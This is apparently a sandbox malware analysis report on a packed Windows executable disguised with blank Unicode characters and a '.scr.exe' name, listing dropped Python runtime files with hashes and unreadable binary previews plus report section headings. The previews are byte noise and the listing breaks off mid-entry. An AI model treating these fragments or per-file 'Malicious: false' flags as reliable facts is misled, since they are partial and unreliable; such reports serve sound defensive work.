Preview:	PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	109438
Entropy (8bit):	7.712242620477564
Encrypted:	false
SSDEEP:	3072:R++YkaNdiyzAWb4rgwFTF6iL5pbkwPuNKHvY:7G4rhtbk5NKHvY
MD5:	0E25A99CD43173252C97103893DC27E2
SHA1:	225196581521723F189DB0D8EABD9B07E9985D9F
SHA-256:	D087BB7C85832990ED37DF305FEF0F5B2325BF775754C8A4BC3F523B32020971
SHA-512:	1FF57D7A0FD8CDA8EBCCDA69E053A3E533E6B9028D1FCAB6FC35C6596C0DB6BC7D12DD37028F0B36997711FD546E757012A4E02DAD00A391399ED72A875CA29C
Malicious:	false
Preview:	PK...........W...............stub-o.pyc.........2.e.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1629464
Entropy (8bit):	7.952620301087112
Encrypted:	false
SSDEEP:	49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5:	27515B5BB912701ABB4DFAD186B1DA1F
SHA1:	3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256:	FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512:	087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.930038440560372
Encrypted:	false
SSDEEP:	3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:	6EDA5A055B164E5E798429DCD94F5B88
SHA1:	2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:	377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:	74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1838360
Entropy (8bit):	7.993871777145928
Encrypted:	true
SSDEEP:	49152:V3Qjrdlkflw6XCRrGhxicF75ShbujR/3z/x:V3Akflw6krEFwujx/x
MD5:

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\??? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\QzNtG.zip

C:\Users\user\AppData\Local\Temp\RES6756.tmp

C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd

Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe